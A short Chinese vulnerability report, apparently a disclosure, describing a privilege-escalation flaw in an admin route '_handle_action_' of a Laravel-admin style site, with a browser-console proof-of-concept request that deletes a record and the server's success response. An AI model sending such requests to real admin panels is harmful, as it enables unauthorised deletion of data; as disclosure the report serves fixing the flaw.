_handle_action_ 越权
发现在后台 admin 中,存在一个路由 xxxxx.com/admin/_handle_action_
传递相应的参数进去,即可操作任何没有权限操作的事情
如下是示例:
控制台请求代码
var url = "xxxxx.com/admin/_handle_action_";
var params = {"_key":"6","_model":"App_Model_Event_Event","_action":"Encore_Admin_Grid_Actions_Delete","_input":"true"};
var xhr = new XMLHttpRequest();
xhr.open("POST", url, true);
xhr.setRequestHeader("Content-Type", "application/json");
xhr.onload = function (e) {
if (xhr.readyState === 4) {
if (xhr.status === 200) {
console.log(xhr.responseText);
} else {
console.error(xhr.statusText);
}
}
};
xhr.send(JSON.stringify(params));
xhr.onerror = function (e) {
console.error(xhr.statusText);
};
## 以下为返回信息
ƒ (e) {
console.error(xhr.statusText);
}
VM4501:9 {"status":true,"then":{"action":"refresh","value":true},"swal":{"type":"success","title":"\u5220\u9664\u6210\u529f !"}}